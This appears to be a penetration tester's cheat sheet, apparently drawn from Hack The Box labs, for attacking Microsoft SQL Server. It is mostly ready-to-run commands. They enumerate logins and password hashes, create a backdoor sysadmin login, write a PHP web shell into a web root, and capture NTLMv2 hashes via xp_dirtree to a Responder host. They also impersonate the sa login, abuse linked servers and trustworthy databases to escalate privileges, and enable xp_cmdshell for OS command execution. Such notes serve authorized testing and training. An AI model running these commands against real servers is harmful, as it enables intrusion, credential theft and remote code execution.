master - keeps the information for an instance of SQL Server.
msdb - used by SQL Server Agent.
model - a template database copied for each new database.
resource - a read-only database that holds the system objects which appear in every database on the server under the sys schema.
tempdb - keeps temporary objects for SQL queries.
Basic Enumeration
# Get version
select @@version;
# Get user
select user_name();
# Get databases
SELECT name FROM master.dbo.sysdatabases;
# Use database
USE master
#Get table names
SELECT * FROM <databaseName>.INFORMATION_SCHEMA.TABLES;
#List Linked Servers
EXEC sp_linkedservers
SELECT * FROM sys.servers;
#List users
select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
#Create user with sysadmin privs
CREATE LOGIN hacker WITH PASSWORD = 'P@ssword123!'
EXEC sp_addsrvrolemember 'hacker', 'sysadmin'
#Get Servername
select @@servername
#Enumerate links
enum_links
#Use a link
use_link [NAME]
#Enumeration MSSQL by using nmap
Intrusionz3r0X@htb[/htb]$ sudo nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 10.129.201.248
#Metasploit enumeration.
auxiliary/scanner/mssql/mssql_ping
#Interact with MSSQL
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient Administrator@10.129.201.248 -windows-auth
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient [-db volume] <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
Intrusionz3r0X@htb[/htb]$ impacket-mssqlclient [-db volume] -windows-auth <DOMAIN>/<USERNAME>:<PASSWORD>@<IP>
# Using sqsh (if you are on Linux)
Intrusionz3r0X@htb[/htb]$ sqsh -S <IP> -U <Username> -P <Password> -D <Database>
## For Windows Auth with a local user, use "." as the domain name
Intrusionz3r0X@htb[/htb]$ sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
Intrusionz3r0X@htb[/htb]$ sqsh -S 10.129.203.7 -U .\\julio -P 'MyPassword!'
## In sqsh you need to send GO after writing the query to execute it
1> select 1;
2> go
## MYSQL (Port: 3306)
#Using sqlcmd (if you are on Windows)
C:\htb> sqlcmd -S 10.129.20.13 -U username -P Password123
C:\htb> sqlcmd -S SRVMSSQL -U julio -P 'MyPassword!' -y 30 -Y 30
#Enable OLE Automation Procedures to allow us to write files
1> sp_configure 'show advanced options', 1
2> GO
3> RECONFIGURE
4> GO
5> sp_configure 'Ole Automation Procedures', 1
6> GO
7> RECONFIGURE
8> GO
#Create file
1> DECLARE @OLE INT
2> DECLARE @FileID INT
3> EXECUTE sp_OACreate 'Scripting.FileSystemObject', @OLE OUT
4> EXECUTE sp_OAMethod @OLE, 'OpenTextFile', @FileID OUT, 'c:\inetpub\wwwroot\webshell.php', 8, 1
5> EXECUTE sp_OAMethod @FileID, 'WriteLine', Null, '<?php echo shell_exec($_GET["c"]);?>'
6> EXECUTE sp_OADestroy @FileID
7> EXECUTE sp_OADestroy @OLE
8> GO
Read Local Files
#Read Local Files in MSSQL
1> EXECUTE('SELECT * FROM OPENROWSET(BULK N''C:\\Windows\\System32\\drivers\\etc\\hosts'', SINGLE_CLOB) AS Contents') AT [LOCAL.TEST.LINKED.SRV];
2> GO
Capture NTLMv2 Hash
#Capture NTLMv2 through the MSSQL by using xp_dirtree
# 1. Start SMB Server
Intrusionz3r0X@htb[/htb]$ sudo responder -I tun0
Intrusionz3r0X@htb[/htb]$ sudo impacket-smbserver share ./ -smb2support
#2. Use the desired method
1> EXEC master..xp_dirtree '\\10.10.110.17\share\'
2> GO
#Capture NTLMv2 through the MSSQL by using xp_subdirs
1> EXEC master..xp_subdirs '\\10.10.110.17\share\'
2> GO
Impersonate Users
It's recommended to run EXECUTE AS LOGIN within the master DB
#----------Impersonate Existing Users with MSSQL----------
1> USE master
2> GO
#Identify Users that We Can Impersonate
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
1> SELECT distinct b.name
2> FROM sys.server_permissions a
3> INNER JOIN sys.server_principals b
4> ON a.grantor_principal_id = b.principal_id
5> WHERE a.permission_name = 'IMPERSONATE'
6> GO
#Verifying our Current User and Role (0:Non-SysAdmin 1:SysAdmin)
1> SELECT SYSTEM_USER
2> SELECT IS_SRVROLEMEMBER('sysadmin')
3> go
#Impersonating the SA User
1> EXECUTE AS LOGIN = 'sa'
2> SELECT SYSTEM_USER
3> SELECT IS_SRVROLEMEMBER('sysadmin')
4> GO
Linked Servers exploitation on MSSQL
Note: If we need quotes inside a query sent to a linked server, we escape each single quote by doubling it (''). To run multiple commands at once we can separate them with a semicolon (;).
#Communicate with Other Databases with MSSQL using a Linked servers
#isremote = 1: remote server
#isremote = 0: linked server
#Identify linked Servers in MSSQL
1> SELECT srvname, isremote FROM sysservers
2> GO
#Execute command in linked server.
1> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS]
2> GO
Cross Forest SQL Server Links Abuse
#Enumerate SQL Server Links
PS C:\Tools> import-module .\PowerUpSQL.ps1
PS C:\Tools> Get-SQLServerLink
#Enumerate login rights for Jimmy
PS C:\Tools> Get-SQLQuery -Query "EXEC sp_helplinkedsrvlogin"
Check the LocalLogin and RemoteLogin attributes to determine whether your user authenticates as a sysadmin on the linked server.
Exploitation on Windows
#Verify whether the current user has sysadmin rights on the linked server (1: sysadmin)
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''sysadmin'')')
#Enable XP_CMDSHELL
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "SQL02\SQLEXPRESS"
#Execute commands
EXECUTE('xp_cmdshell "whoami"') AT "SQL02\SQLEXPRESS"
Exploitation on Linux
#Authenticate on MSSQL
Intrusionz3r0@htb[/htb]$ mssqlclient.py jimmy@10.129.229.188 -windows-auth
#Enumerate SQL Server Links and Login Rights
SQL (inlanefreight\jimmy guest@master)> enum_links
#Use linked server
SQL (inlanefreight\jimmy guest@master)> use_link "SQL02\SQLEXPRESS"
#Enable XP_CMDSHELL
SQL >"SQL02\SQLEXPRESS" (sa dbo@master)> enable_xp_cmdshell
#Execute commands
SQL >"SQL02\SQLEXPRESS" (sa dbo@master)> xp_cmdshell whoami
Trustworthy Databases
If our user has not been granted a remote login mapping as sysadmin (sa), but instead only has public privileges as a local SQL user, we can enumerate the trustworthy databases on the targeted linked server. The objective is to determine whether the user holds the db_owner role on any trustworthy database. If such a database is identified, we can create a stored procedure to enable xp_cmdshell, ensuring it executes under the context of the database OWNER, which typically would be the sa user.
Requirements
Identified a trustworthy database
Confirmed our current user's login name
Confirmed our current user holds the db_owner role on that database
#Retrieve the login identification name
select * from openquery("SQL02\SQLEXPRESS",'select SUSER_NAME()')
#Check if we have public access rights
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''public'')')
select * from openquery("SQL02\SQLEXPRESS",'select IS_SRVROLEMEMBER(''sysadmin'')')
#Retrieve Databases
select * from openquery("SQL02\SQLEXPRESS",'select name FROM master.dbo.sysdatabases')
#Identify databases that have TRUSTWORTHY enabled (1: enabled)
select * from openquery("SQL02\SQLEXPRESS",'SELECT a.name,b.is_trustworthy_on FROM master..sysdatabases as a INNER JOIN sys.databases as b ON a.name=b.name;')
#Verify whether our user has the db_owner role
EXEC ('sp_helpuser') AT "SQL02\SQLEXPRESS"
#Verify the owner of the database (1: owner=sa)
select * from openquery("SQL02\SQLEXPRESS",'SELECT name as database_name , SUSER_NAME(owner_sid) AS owner , is_trustworthy_on AS TRUSTWORTHY from sys.databases;')
Exploitation on Windows
#Verify that RPC Out (is_rpc_out_enabled) is enabled on the link, since EXEC ... AT depends on it.
select is_rpc_out_enabled from sys.servers where name='SQL02\SQLEXPRESS'
#Create procedure as sysadmin
EXEC ('CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember ''htb-dbuser'',''sysadmin''') AT "SQL02\SQLEXPRESS"
#verify the privileges of the current user once again
EXEC ('sp_escalate;SELECT IS_SRVROLEMEMBER(''sysadmin'');
SELECT SUSER_NAME()') AT "SQL02\SQLEXPRESS"
#Enable XP_CMDShell
EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT "SQL02\SQLEXPRESS"
#Execute commands:
EXECUTE('xp_cmdshell "whoami"') AT "SQL02\SQLEXPRESS"
Exploitation on Linux
#Enumerate linked database
enum_links
#Use a linked server
use_link "SQL02\SQLEXPRESS"
#Enumerate trustworthy databases (1: enabled)
enum_db
#verify whether our currently identified user holds the db_owner role
enum_users
#Verify databases owners
SELECT name as database_name, SUSER_NAME(owner_sid) AS owner, is_trustworthy_on AS TRUSTWORTHY from sys.databases;
#Use database
USE "htb-reports"
#Create Procedure
CREATE PROCEDURE sp_escalate WITH EXECUTE AS OWNER AS EXEC sp_addsrvrolemember 'htb-dbuser','sysadmin'
#Execute Procedure
EXEC sp_escalate
#Verify the Sysadmin right on current user
SELECT is_srvrolemember('sysadmin')
#Enable XP_CMDSHELL
exec master.dbo.sp_configure "show advanced options",1;RECONFIGURE;exec master.dbo.sp_configure "xp_cmdshell", 1;RECONFIGURE;
#Execute commands
exec master..xp_cmdshell "whoami"